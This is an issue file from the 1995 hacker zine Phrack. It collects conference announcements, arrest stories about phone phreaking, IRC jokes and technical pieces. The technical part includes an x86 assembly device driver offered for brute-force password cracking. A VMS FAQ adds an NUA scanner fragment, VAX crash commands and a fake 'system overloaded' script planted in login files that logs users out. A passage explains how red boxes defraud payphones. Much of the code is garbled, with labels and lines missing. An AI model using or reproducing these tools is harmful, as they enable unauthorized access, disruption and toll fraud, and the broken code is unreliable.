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==Phrack Magazine==
Volume Six, Issue Forty-Seven, File 3 of 22
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Phrack Magazine and Computer Security Technologies proudly present:
The 1995 Summer Security Conference
June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia
This is the official announcement and open invitation to the 1995
incarnation of Summercon. In the past, Summercon was an invite-only
hacker gathering held annually in St. Louis, Missouri. Starting
with this incarnation, Summercon is open to any and all interested
parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators,
Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers,
Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers,
Programmers, Conspiracy Nuts, Musicians and Nudists.
The Clarion Hotel is located in downtown Atlanta, 9 miles from
Hartsfield International Airport and just a few blocks from the
Peachtree Center MARTA Station.
Considering the exorbitant expenses involved with attending other
conferences of this type, Rooms at Summercon are reduced to
$65 per night for Single or Double Occupancy
The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
Atlanta, GA 30303
(404) 659-2660 or (800) 241-3828 (404) 524-5390 (fax)
No one likes to pay a hundred dollars a night. We don't expect you
to have to. Spend your money on room service, drinks in the hotel bar,
or on k-rad hacker t-shirts. Remember: Mention that you are attending
Summercon in order to receive the discount.
75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland
then turn left on Houston (John Wesley Dobbs Ave.)
20 East - Exit 75/85 North at International. Turn Left on Courtland at
Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)
20 West - Exit 75/85 North at International. One block to Courtland
and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)
Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's
International Airport will drop you off at many hotels in the downtown
area, including the Clarion. The shuttle should be no more than 12
dollars. Fares may be paid at the Airport Shuttle in the Ground
Transportation area of the Airport Terminal.
MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a
convenient and inexpensive way to negotiate most of the Atlanta area.
Take the MARTA train from the Airport to the Peach Tree Center Station.
Walk three blocks down Houston to the intersection of Houston and
Courtland. The MARTA fare will be roughly 2 dollars.
Taxis - The average cab fare from Atlanta's Airport to the downtown area
is roughly 30 dollars.
It has always been our contention that cons are for socializing.
"Seekret Hacker InPh0" is never really discussed except in private
circles, so the only way anyone is going to get any is to meet new people
and take the initiative to start interesting conversations.
Because of this, the formal speaking portion of Summercon will be
held on one day, not two or three, leaving plenty of time for people
to explore the city, compare hacking techniques, or go trashing and
clubbing with their heretofore unseen online companions.
The "Conference" will be held on June 3rd from roughly 11:00 am until
6:00 pm with a 1 hour lunch break from 1:00 to 2:00.
and still photography will be permitted.
Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source
Solutions (a private sector intelligence firm)
Topic: Hackers from the Intelligence Perspective
Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise",
Publisher of Security Insider Report, and noted security
Topic: Electromagnetic Weaponry
Bob Stratton - Information Security Expert from one of America's largest
Internet service providers
Topic: The Future of TCP/IP Security
Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks"
Topic: Cryptography, Banking, and Commerce
Annaliza Savage - London-based Director/Producer
Topic: Discussion of her documentary "Unauthorized Access"
(Followed by a public screening of the film)
Chris Goggans - Editor of Phrack Magazine and Summercon M.C.
Topic: introductions, incidentals and a topic which is sure
to culminate in an international incident.
(Other Speakers May Be Added - Interested parties may contact scon@fc.net)
Since other cons of this type have been charging from 25 to 40 dollars
entry fees, we are only charging 10 dollars. Yes, that's correct,
TEN (10) dollars in US currency. Money is far too scarce among the
hacker community to fleece everyone for money they will probably need
to eat with or pay for their hotel rooms.
To attempt to make everyone's stay in Atlanta more exciting, we are
contacting local establishments to arrange for special discounts and/or
price reductions for Summercon attendees. Information will be handed
out regarding these arrangements at the conference.
Atlanta is a happening town.
Touristy Stuff Party Time
The World of Coca-Cola Buckhead
Underground Atlanta The Gold Club
Georgia Dome (Baseball?) (Countless Other Clubs and Bars)
Six Flags
You can contact the Summercon sponsors by several means:
E-mail: scon@fc.net
WWW: http://www.fc.net/scon.html
Snail Mail: Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
If deemed severely urgent, you can PGP your email with the following PGP
Version: 2.6
See you in Atlanta!
Version: 2.6
"Unauthorized Access [is] a documentary that tells the story of the
computer underground from our side, it captures the hacker world
from Hamburg to Los Angeles and virtually everywhere in between."
2600 The Hacker Quarterly
Computers are becoming an integral part of our everyday existence.
They are used to store and send a multitude of information, from
credit reports and bank withdrawals, to personal letters and highly
sensitive military documents. So how secure are our computer
The computer hacker is an expert at infiltrating secured systems,
such as those at AT&T, TRW, NASA or the DMV. Most computer systems
that have a telephone connection have been under siege at one time
or another, many without their owner's knowledge. The really good
hackers can reroute the telephone systems, obtain highly sensitive
corporate and government documents, download individual's credit
reports, make free phone calls globally, read private electronic
mail and corporate bulletins and get away without ever leaving a
So who are these hackers? Just exactly WHAT do they do and WHY do
they do it? Are they really a threat? What do they DO with the
information that they obtain? What are the consequences of their
actions? Are hackers simply playing an intellectual game of chess
or are hackers using technology to fight back and take control of
a bureaucratic system that has previously appeared indestructible?
Unauthorized Access is a documentary that demistifies the hype and
propaganda surrounding the computer hacker. Shot in 15 cities
and 4 countries, the film hopes to expose the truths of this subculture
focusing on the hackers themselves.
Unauthorized Access is a view from inside the global underground.
For a PAL (European) copy send a cheque/postal order for 15 British
Pounds or $25 for NTSC (American) standard to:
Savage Productions
Suite One
281 City Road
London EC1V 1LA
Hacking Conference
1st - 2nd July, 1995
(Saturday & Sunday)
King's College, London, UK
The first UK hacking conference, Access All Areas, is to be run in London
later this year. It is aimed at hackers, phone phreaks, computer security
professionals, cyberpunks, law enforcement officials, net surfers,
programmers, and the computer underground.
It will be a chance for all sides of the computer world to get together,
discuss major issues, learn new tricks, educate others and meet "The
Access All Areas is to be held during the first weekend of July, 1995 at
King's College, London. King's College is located in central London on
The Strand and is one of the premier universities in England.
There will be a large lecture theatre that will be used for talks by
computer security professionals, legal experts and hackers alike. The
topics under discussion will include hacking, phreaking, big brother and
the secret services, biometrics, cellular telephones, pagers, magstrips,
smart card technology, social engineering, Unix security risks, viruses,
legal aspects and much, much more.
Technical workshops will be running throughout the conference on several
topics listed above.
A video room, equipped with multiple large screen televisions, will be
showing various films, documentaries and other hacker related footage.
The conference facilities will also include a 10Mbps Internet link
connected to a local area network with various computers hanging off of it
and with extra ports to connect your laptop to.
Registration will take place on the morning of Saturday 1st July from
9:00am until 12:00 noon, when the conference will commence. Lectures and
workshops will run until late Saturday night and will continue on Sunday
2nd July from 9:00am until 6:00pm.
The price of admission will be 25.00 British pounds (approximately US $40.00)
at the door and will include a door pass and conference programme.
Accommodation in university halls of residence is being offered for the
duration of the conference. All prices quoted are per person, per night
and include full English breakfast. (In British pounds)
Special prices for British and Overseas university students, holding
current student identification, are also available - please call King's
Campus Vacation Bureau for details.
All bookings must be made directly with the university. They accept
payment by cash, cheque and credit card.
To making a booking call the following numbers...
Telephone : +44 (0)171 351 6011
Fax : +44 (0)171 352 7376
If you would like more information about Access All Areas, including
pre-registration details then please contact one of the following...
Telephone : +44 (0)973 500202
Fax : +44 (0)181 224 0547
Email : info@phate.demon.co.uk
InfoWarCon '95
A 2 Day International Symposium
on Information Warfare
September 7-8, 1995
Stouffer Concourse Hotel
Arlington, VA
Presented by:
National Computer Security Association
Winn Schwartau and Interpact, Inc.
Robert Steele and OSS, Inc.
The Information Warfare Conference (InfoWarCon) is our third
international conference dedicated to the exchange of ideas,
policies, tactics, weapons, methodologies and defensive posture
of Information Warfare on a local, national, and global basis.
InfoWarCon will bring together international experts from a broad
range of disciplines to discuss and integrate concepts in this
rapidly evolving field. Attendees will intensely interact with
the speakers and presenters as well as each other to increase
each other's understanding of the interrelatedness of the topics.
While there are many interpretations of Information Warfare by
different groups, the current working definition we employ is:
Information Warfare is the use of information and informa
tion systems as weapons in a conflict where information and
information systems are the targets.
Information Warfare is broken down into three categories, and
InfoWarCon speakers and attendees will interactively examine them
Class I: Personal Privacy. "In Cyberspace You Are Guilty
Until Proven Innocent." The mass psychology of information.
Privacy versus stability and law enforcement.
Class II: Industrial and Economic Espionage. Domestic and
international ramifications and postures in a globally
networked, competitive society.
Class III: Global Information Warfare. Nation-state versus
Nation-state as an alternative to convention warfare, the
military perspective and terrorism.
The conference is designed to be interactive - with extensive
interaction between all participants. The preliminary contents
and discussions will focus on:
- What is Information Warfare?
- What Are the Targets?
- Protecting the Global Financial Infrastructure
- Military Perspectives on InfoWar
- InfoWar Vs. Non-Lethal Warfare
- Defending the U.S. Infrastructure
- The Intelligence Community and Information
- Open Source Intelligence
- The Psychology of Information
- Privacy Balances
- Information As the Competitive Edge
- International Cooperation
- Denial of Service
- Cyber-Terrorism
- Offensive Terrorism
- Offensive InfoWar Techniques
- Defensive InfoWar Postures
- Education and Awareness Training
- Corporate Policy
- Government Policy
- Global Policy
- Espionage
- Export Controls of Information Flow
- The Legal Perspective
- The New Information Warriors
Plenary sessions will accommodate all attendees, while break-out
sessions will provide more intimate presentations and interactiv
ity on topics of specific interests.
Submission for papers are now be accepted. We are looking for
excellent speakers and presenters with new and novel concepts of
Information Warfare. You may submit papers on the topics listed
above, or on others of interest to you, your company or govern
We welcome innovative thought from the private sector, the gov
ernment (civilian, military and intelligence) and the interna
tional community. Submissions must be received by May 1, 1995,
and notification of acceptance will occur by June 1, 1995.
Please submit 2-3 page presentation outlines to:
All submissions and the contents of InfoWarCon '95 will be in
English. If you must submit a hard copy: Fax: 813.393.6361 or
snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL
All submissions and presentation should be unclassified, as they
will become Open Source upon submission and/or acceptance.
The Information Warfare Symposium is currently choosing sponsors
for various functions.
Continental Breakfast, Day 1 and Day 2
Morning Coffee Break, Day 1 and Day 2
Lunch, Day 1 and Day 2
Afternoon Coffee Break, Day 1 and Day 2
Cocktail Party, Day 1
Each Corporate or Organizational sponsor will be included in all
promotional materials and Symposium function. For more infor-
mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or
email: 747774.1326@Compuserve.com.
Limited space is available for table-top displays for commercial
or governmental products, services, educational or other promo
tion. For further information, contact Paul Gates at the National
Computer Security Association. 717.258.1816
Payment made BEFORE July 1, 1995:
( ) $445.00 NCSA Member/OSS Attendee
( ) $545.00 All others
Payment made AFTER July 1, 1995:
( ) $495.00 NCSA Members/OSS Attendees
( ) $595.00 All others
( ) I'M INTERESTED, but would like more information sent to the
address above. Please include a free copy of your 32 page
"Information Security Resource Catalog".
( ) I'd like to know more about NCSA on-site training, security
audits and consulting services. Please have someone give me
a call.
National Computer Security Association
10 South Courthouse Avenue
Carlisle, PA 17013
Phone 717-258-1816 or FAX 717-243-8642
EMAIL: 74774.1326@compuserve.com
Winn Schwartau Interpact, Inc.
Information Security & Warfare
V:813.393.6600 F:813.393.6361
Email: Winn@Infowar.Com
Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested
on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
of a device to commit Telecommunications fraud charges. He is being held in
Delaware County Prison in lieu of $100,000.00 Bail. His story follows.
On the evening of the 13th Bernie S. received a page from his mail drop.
Some people he knew from Florida had stopped in at his mail drop thinking
it was his address. They were looking to purchase several 6.5 Mhz Crystals.
These crystals when used to replace the standard crystal in the RADIO SHACK
Hand Telephone dialer, and with some programming, produce tones that trick
pay phones into believing they have received coins. These are commonly
referred to as "red boxes" and got their name from an actual red box pulled
from a pay phone in the late seventies by some curious person.
Ed Cummings met these people at a local 7-11 (which 7-11?) where he was
to sell the widely used electronic timing crystals for roughly $4 a piece.
The purchaser only had two twenty dollar bills and Ed Cummings no change.
Ed Cummings went into the 7-11 to get some change to make the transaction.
A police officer noticed a van parked in the parking lot of the 7-11 with
more several African Americans inside. As Ed was leaving the 7-11 he noticed
fifteen police cars pulling into the parking lot of the 7-11.
Next thing he knew the police were asking him if they could `rifle`
through his car. He said no. Moments later as he was talking to a Detective
and noticed another police officer going through his car. He asked the officer
to stop. They did not, in all the police confiscated a few hundred 6.5Mhz
crystals (which he resells for roughly $4 a piece) and a large box of 100
dialers. The police told him they would get back to him, and he could have
his electronics back if the contents of the bag were legal. In the contents
of the seized items was one modified dialer, that a customer returned after
modification explaining that it did not work, a broken red box.
The next day Ed `Bernie S.` Cummings was over at a friend`s house working
on their computer when eight to ten plain clothed armed men burst into the
house and ordered him and his friends to freeze. They cuffed him and took him
to a holding cell (what jail?). There he was left without a blanket or jacket
to sleep with in the cold cell.
That evening the Secret Service had been called in when someone figured
out what the dialers and crystals would do when put together. The
United States Secret Service found his home and entered it, while they were
questioning him.
The next morning at his arraignment he was finally told of the charges
he was being held upon. They were Two misdemeanor Charges of manufacture,
Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful
use of a computer charges. His bail was automatically set to $100,000.00
because Ed Cummings refused talk with the police without his attorney present.
The Secret Service presented to the judge a 9 page inventory of what
they had found in his home. On that inventory there 14 computers. 2 printers.
more Boxes of bios chips for the systems he worked with. Eprom burners which
the Federal Agents had labeled "Cellular telephone chip reprogramming adapters"
Eproms are used in everything from Automobile computers to personal computers.
They also confiscated his toolbox of screw drivers, wire clippers and other
computer oriented tools he used for his consulting job.
The Judge dropped the Two unlawful use of a computer charges due to
the fact that the evidence was circumstantial and the county had no actual
evidence that Ed had ever used the computers in question.
As of 3/27/1995 Ed Cummings is still in Delaware County Prison
awaiting his trial. His trial has not yet been scheduled and Ed will most
likely not raise the One Hundred Thousand Dollars needed to be released on
"Don't believe the hype." - Public Enemy, 1988
This file's purpose is to clear up any misconceptions about the recent
situation that has come upon the sociopolitical group known as KoV.
As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for
ANYTHING. We have received several tip-offs from private sources regarding
a supposed "FBI investigation" of our group that is purported to be active
at this very minute. However, with the exception of a few VERY suspicious
incidents and coincidences, there has been NO HARD EVIDENCE thus far about
ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for
the integrity of our innocence, we must stress that nothing has gone down.
We have very good reason to believe that a few of those among us are about
to be charged with various false accusations by a local university. However
the current mental state of the person in charge of this charade is also in
question. Therefore it would be logical to assume nothing. The conflicting
tip-offs, rumors, warnings and threats that we have received make it even
more difficult to get a clear picture of exactly what is going on. We have
heard so many things from so many different sources, both credible and
questionable, that we would be hard-pressed to give an accurate evaluation
of the current state of things.
What we can say for sure, however, is that KoV officially died on Monday,
January 23, 1995, along with its communications network, KoVNet. This
promises to be a great loss to the open-minded and sociopolitical community
as well as the free-thinkers and activists who supported us so generously.
Our reasons for disbanding the group were many, but the foremost was in
light of the current situation we are facing.
Consider this last obstacle our final, stalwart stand against the evils of
AmeriKKKan government and its various greedy, capitalistic agencies.
From the moment of KoV's conception, they have publicly sought to destroy
us; to silence our questioning of authority, to oppress our free-thinking
minds, and to close off our intellectual channels of communication. They
have even gone so far as to stalk us in public places. 'Tis a shame indeed.
If you have any questions or if you wish to contact us for any reason,
you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV".
I will try to post further updates of this saga to CiPNet, ThrashNet,
QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can.
We would appreciate any support that other h/p, art or political groups can
lend us. Until then, my friends...
-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV
What happens when you are caught beige boxing.
by Rush 2
Yeah yeah, I'm the only one. But here is a generally interesting
description of everything to getting caught to arraignment.
Well about 5 months ago i needed to set up a conference really quick..
it was about 12:00 (never knew there was a 10:00 pm curfew in that area)
and went to a 25 pair box at this local strip mall. Well I was out there
the box was already open and I was just about to start testing pairs to
see which was connected and what wasn't.
All of a sudden, i hear this loud screeching sound of a car coming
to a skid from doing about 90mph. I turned and saw that typically dirty
squad car about to hit me.. you know the car, mud and dust on the tires
and body, coffee and smudge marks all over the windshield. i got on my
bike and started to run. Now the thing is I COULD have gotten away.. the
pathetic excuse for a cop had run not more than 10 yards after me and
decided that I was a threat so he pulled his handgun and yelled. I saw
this and thought it would be wiser to stop than get shot.
Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
not know i was less than a half mile from a police station and they were
looking for a prowler in the general area. The police did the normal,
called me scum, asked me what i was doing, searched me until they were
satisfied... than picked me up and threw me in the car... the funny
thing was they didn't see my phone until they threw me into the back seat
and the cord fell out.. (they never saw the page of notes and 'naughty'
material in my pocket though it was about 4 inches thick and sticking out
that a blind man could see it.
Well they got me to the station and pried my info out, and called my
father... I came up with a good enough story about some made up user
who told me to go across the street and plug in.. then I was told I
would be dealt with in the next week... I did not receive anything for
three and a half months.
Once the time came for the arraignment (for a juvenile they called it
an intake). I got to go to the police station, sit for about 3 hours (as
if i thought they would be on time) until I waited for my probation
officer. Finally she got there and we proceeded to talk. She explained
all of the charges and my lawyer (interesting guy) laughed, I was being
charged with prowling (could be disputed I was on a public sidewalk and
there in that strip mall is a 24 hr laundry mat), loitering (again that
could be disputed), and attempted theft of services (though I NEVER even
plugged in).
After this was all said i spent the next hour talking with the lady
in private. I immediately found she had an interest in computers and was
having a problem with her home pc. So I easily changed the topic to my
fascination in computers and solved her problem with her computer, and
answered at least 50 questions about them. In the last 10-15 minutes of
the conversation all i could get from her were statements about how
impressed and how intrigued she was with me. She ended up giving me a
look (that was hard to judge but i am staying away from this chick) that
was either confusion or attraction, slipped me a card with her home phone
number and name and called back in my lawyer and parents.
Once they got back in, all that she really said was I was a great boy,
that she would like to see me do more with my time besides computers, and
that she was taking my sentence of 12 months formal probation with 300
hours of community service to 3 months of informal probation with 30
hours of community service. That and she said bell was asking her what
to do and she would tell them that it was a non issue since I did not
plug in and even if I had it would not be their concern unless I had
plugged in to the telco access part of the network interface.
Well I have yet to receive official record of having to perform
the community service or the probation but I called my probation officer
yesterday and said she wasn't putting the community service into the
punishment and it has been an equivalent amount of time to just say that
since I haven't gotten in trouble since she will count the probation as
already served. Luckily she based all other needs of me on the report
from a teacher, and with my luck she picked the one teacher, my computers
teacher, that no matter what I did or said would lie and say I didn't.
Thanks to erikb for publishing this, and greets to CXrank, paradox,
dark phiber, the fat cop (who spilled his coffee and box of donuts
coming after me) that made this all possible, and to everyone else.
-rush 2
Look for My site, unforeseen danger soon to be on a 28.8 slip
and by the end of the summer on a 500k slip connect.
[Something found on IRC]
Danny Partridge Emmanuel Goldstein
(AKA Danny Bonaduce: (AKA Eric Corley:
a child star from the child-like publisher
"The Partridge Family" of 26oo magazine.
---------------------- ------------------
Hosts a boring local Hosts a boring local
radio program. radio program.
Quasi Celebrity Quasi Celebrity
Status among Status among
70's freaks telephone phreaks
Periods of Heavy Periods of Heavy
Drug Usage Drug Usage
Involved in Sex Involved in Sex
Scandal with Scandal with
another man another man
Last name is Friends with Phiber
"Bonaduce" Optik whose first
handle was "Il Duce"
Supplements incoming Supplements incoming
by doing desperate by doing desperate
local talk shows local talk shows
whenever he can. whenever he can.
Top 10 #hack fights that would be the coolest to see.
(And no, Ophie's not in it twice just because she's a girl...)
10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling
featuring KL & TK.
9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the
one after that... or, uh...
8.) C-Curve and Elite Entity, "Who's who?"
7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere."
(Or: "I'm totally numb, let me hug you!!!")
6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"
5.) Grayarea vs. Netcom "No, *I* want root..."
4.) WWF Wrestling with Len and |al|.
3.) Ophie vs. Voyager, "Night of the Living Dead."
2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle."
and the number one #hack fight is
1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"
P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit
The device driver code listed below provides a data stream of passwords.
The device driver approach was used to speed up the process
of cracking passwords on an incremental basis. The usual approach was
to generate the passwords to a file, then reading the file, etc..the device
driver approach circumvents these file storage problems, and others, such as
having enough free disk space and delays from disk i/o.
This driver operates completely in memory (approx. 0.5Kb)
How practical is this?
This program would be very useful if you think you may know what strategy
the user/admin uses for picking out their passwords. Without eliciting some
sort of a strategy, forget it-- unless your desperate enough!!
A "strategy" could consist of any of these possible advantages--
1) default passwords (ie: SIN, student #, birth date, phone number...)
2) the mutation of a lUSERs' known password from another system
3) viewing the mark typing in most of their password with a couple
of unseen characters
4) etc...
With the sample device driver provided, passwords starting at
'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length
of the password string can be modified by changing the length of
the password string itself (that is, the variable "number"). The
range of characters in the passwords can also be changed by
modifying the following two lines:
for ending character--
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
...and for starting character
cmp byte ptr [number+si],'a' ;starting char. in range
for instance, if you wished to generate numbers from "0000000" to
-change the ending character to:
cmp byte ptr [number+si],'9'+1
-starting character to:
cmp byte ptr [number+si],'0'
and "number" variable from 'aaaaaa' to '0000000' and then
..or in the third case, if u had observed a lUSER type in most of
their password, you may want to rewrite the code to limit the
search. IE: limit the keys to a certain quadrant of the keyboard.
Modify the code starting at "reiterate:" and ending at "inc_num
endp" for this.
/'nuff of this!/ How do I get things working?
Compile the device driver "hackdrv.sys", and the second program,
"modpwd.asm". Then specify the device driver inside config.sys
(ie: "c:\hackdrv.sys"). The code below was compiled with the a86
compiler, v3.03. Some modifications might be needed to work with
other compilers.
To use it in prgs like crackerjack, type in the following on the
command line:
c:\>jack -pwfile:<your password file here!> -word:hackpwd
If you had stopped a cracker program (eg: crackerjack) and want to
pick up from where you left off, run the program "modpwd.com".
This program can change HACKDRVs password through-
a) a command line argument (ie: "modpwd aabbbbe")
b) executing the program with no parameters (this method also
displays the current password in memory)
Happy Hacking,
Uncle Armpit
;-----------------------cut here--------------------------------
org 0h
next_dev dd -1
attribute dw 0c000h ;character device w/ ioctl calls
strategy dw dev_strategy
interrupt dw dev_int
dev_name db 'HACKPWD '
countr dw offset number
number db 'aaaaaa',0ah ;<----six characters, lower case
numsize equ $-number - 2
;working space for device driver
rh_ofs dw ?
rh_seg dw ?
dev_strategy: ;strategy routine
mov cs:rh_seg,es
mov cs:rh_ofs,bx
dev_int: ;interrupt routine
push ds
push es
push ax
push bx
push cx
push dx
push di
push si
push cs
pop ds
mov bx,cs:rh_seg
mov es,bx
mov bx,cs:rh_ofs
mov al,es:[bx]+2
rol al,1
mov di,offset cmdtab
xor ah,ah
add di,ax
jmp word ptr[di]
cmdtab: ;command table
dw init ;0
dw exit3 ;1
dw exit3 ;2
dw ioctl_read ;3
dw do_read ;4
dw exit3 ;5
dw exit3 ;6
dw exit3 ;7
dw exit3 ;8
dw exit3 ;9
dw exit3 ;10
dw exit3 ;11
dw ioctl_write ;12
dw exit3 ;13
dw 5 dup (offset exit3)
push es
push bx
mov si,es:[bx+10h]
mov di,es:[bx+0eh]
mov es,si
push cs
pop ds
mov si,offset number
xor cx,cx
inc cl
cmp al,0ah
jz ioctl_rend
jmp get_char
pop bx
pop es
mov es:[bx+012h],cx
mov cs:countr,offset number
jmp exit2
push es
push bx
mov si,es:[bx+010h]
mov ds,si
mov si,es:[bx+0eh]
mov cx,numsize+1 ;es:[bx+012h]
push cs
pop es
mov di,offset number
repe movsb
pop es
pop bx
mov cs:countr,offset number
jmp exit2
push es
push bx
push cs
pop ds
mov si,[countr]
inc si ;word ptr [countr]
cmp si,offset afternum
jnz is_okay
mov si,offset number
call inc_num
mov [countr],si
mov di,es:[bx]+0eh
mov ax,es:[bx]+010h
mov cx, es:[bx]+012h
jcxz clean_up
mov es,ax
repe movsb
pop bx
pop es
jmp exit2
exit3: mov es:word ptr 3[bx],08103h
jmp exit1
mov es:word ptr 3[bx],0100h
pop si
pop di
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
inc_num proc near
push si
mov si,numsize
inc byte ptr [number+si]
cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range
jnz _exit
mov byte ptr [number+si],'a' ;starting char. in range
dec si
cmp si,-1
jnz reiterate
mov byte ptr [number],01ah ;send EOF
pop si
inc_num endp
at_eof: ; the non-resident code starts here
initial proc near
push es
push cs
pop ds
push cs
pop es
mov si,offset number
mov di,offset tmpnum
cmp al,0ah
jz _nomorechars
jmp _again
mov si,offset msgend
mov cx,4
repe movsb
mov ah,09 ;print welcome message
mov dx,offset msg1
int 21h
pop es
initial endp
init: call initial
mov ax,offset at_eof
mov es:[bx]+0eh,ax
push cs
pop ax
mov es:[bx]+010h,ax
mov cs:word ptr cmdtab,offset exit3
jmp exit2
msg1 db "Incremental Password Generator (c)1995",0ah,0dh
db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
db "Starting at word ["
tmpnum db 10 dup (?)
msgend db "]",0a,0d,'$'
;END hackdrv.sys
;------------------------------cut here----------------------------------
;PROGRAM modpwd.asm
org 0100h
mov ax,03d02h
xor cx,cx
mov dx,offset devname
int 21h
jnc drvr_found
mov ah,09
mov dx,offset no_drvr
int 21h
jmp error_pass
mov bx,ax
mov ax,04402h
mov cx,20 ;read 20 characters
mov dx,offset databuffr
int 21h
mov pass_len,al
dec al
mov ah,al
and al,0fh
mov cl,4
shr ah,cl
add ax,03030h
cmp al,'9'
jbe inrange
add al,7
cmp ah,'9'
jbe inrange1
add ah,7
mov byte ptr [num_chr],ah
mov byte ptr [num_chr+1],al
mov di,offset databuffr-1
xor cx,cx
mov cl,pass_len
add di,cx
mov si,offset pass_end
mov cx,stringsz
repe movsb
;check for information in command line
;else--> prompt for user input
mov al,pass_len
or byte ptr [0080h],0
jz req_input
mov cl,[0080h]
dec cl
mov [0081h],cl
mov si,0081h
mov di,offset newpass
mov cx,20
repe movsb
jmp vrfy_info
mov ah,09
mov dx,offset cur_pass
int 21h
mov ah,0a
mov dx,offset pass_len
int 21h
mov ax,word ptr [pass_len]
cmp ah,0
jz error_pass
dec al
cmp ah,al
jnz error_len
;change the current password
xor cx,cx
mov cl,al
mov ah,044h
mov al,03
mov dx,offset newpass+1
int 21h
jnc success_pass
mov ah,09
mov dx,offset errormsg
int 21h
mov ax,04c01h ;abnormal termination
int 21h
mov ax,04c00h
int 21h
devhandle dw ?
cur_pass db 'Current password is ['
databuffr db 20 dup (?)
pass_end db '] ;'
num_chr db ' '
db ' characters',0ah,0dh,0ah,0dh
prompt db 'New word: ','$'
stringsz equ $ - pass_end
pass_len db 00
newpass db 20 dup (?)
errormsg db 'error changing password!',0ah,0dh,'$'
no_drvr db 'Error: '
devname db "HACKPWD ",00
db 'device driver not loaded!',0ah,0dh,07,'$'
-- Frequently & Rarely asked questions about VMS -- part one
by Opticon the Disassembled - UPi
" I have a kropotkin.hlp file. What could I possibly do with it ? "
$ library /insert /help sys$help:helplib.hlb kropotkin.hlp
$ help kropotkin
" I have a bakunin.tlb file. What to do with it ? "
$ library /extract=(*) bakunin.tlb
$ dir
" I would like to have a look at prunton.dat. "
$ dump [/block=(count:x)] prunton.dat
Where "x" is the number of blocks DUMP will display.
" How can I use an external editor with mail ? "
$ mail :== mail /edit=(send,reply=extract,forward)
" How a HELP file is organized ? "
$ create example.hlp
" How can I have a look at queues ? "
$ show queue smtp /all/full
$ show queue /batch/all/full
$ show queue /all/full
" My mail is holded, for some reason, in the SMTP queue... "
$ delete /entry=XXX
$ set entry XXX /release
in order to force VMS to release it right away.
" How do I have a look at DTE and circuits available. "
$ mc ncp show known dte
$ mc ncp show known circuits
You may also may find of interest:
$ mc ncp show known networks
$ mc ncp show known lines
$ mc ncp show known destinations
" I need a NUA scanner for VMS. "
$ WAIT 00:00:06
$ CONTEXT = ""
$ MSSG = " Process stopped"
$ DTE = DTE + 1
( I don't have a clue by whom the code was written. )
$ create scan.val
$ submit /noprint scan.com
$ search scan.lis "call connected"
" How do I crash a VAX !? "
$ set default sys$system
$ @shutdown
$ set default sys$system
$ run opccrash
" I have a dostogiefski.cld file; what do I do with it ? "
$ set command dostogiefski.cld
" Can I send messages to interactive processes ? "
$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "
" How can I prevent someone from phoning me all the time ? "
$ set broadcast=(nophone)
" Can I postpone/disable interactive logins ? "
$ set logins /interactive=0
$ set logins /interactive
will display current value.
Under the same `logic' :
$ create innocent_filename.com
$ set nocontrol
$ context = ""
$ pid = F$PID(context)
$ user_name = F$GETJPI(pid,"username")
$ wait 00:01:00.00
$ write sys$output ""
$ write sys$output " System overloaded; please try again later "
$ write sys$output " Logging out process ''pid', of user ''user_name' "
$ write sys$output ""
$ logout /full
Add either to sys$system:sylogin.com or sys$login:login.com the following:
" $ @innocent_filename.com ".
" How can I modify the welcome file ? Where is it held ? "
$ set default sys$system
$ edit welcome.txt
" I am editing a huge text file. How can I reach the end of it ? "
at the editor's prompt type:
*find end
*find "search string"
" How can I be sure than noone is watching me from a hidden process ? "
$ show system /process
VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25
Pid Process Name State Pri I/O CPU Page flts Ph.Mem
00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47
00000117 SMTP_SYMBIONT HIB 4 33398 0 00:16:49.67 246104 426
00000118 SYMBIONT_6 HIB 4 47868 0 00:05:09.01 296 121
00001255 SYMBIONT_0001 CUR 13 15 64293 0 00:05:08.12 1982 248
$ show system /full
VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43
Pid Process Name State Pri I/O CPU Page flts Ph.Mem
00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47
00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502
00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121
00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268
See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4,
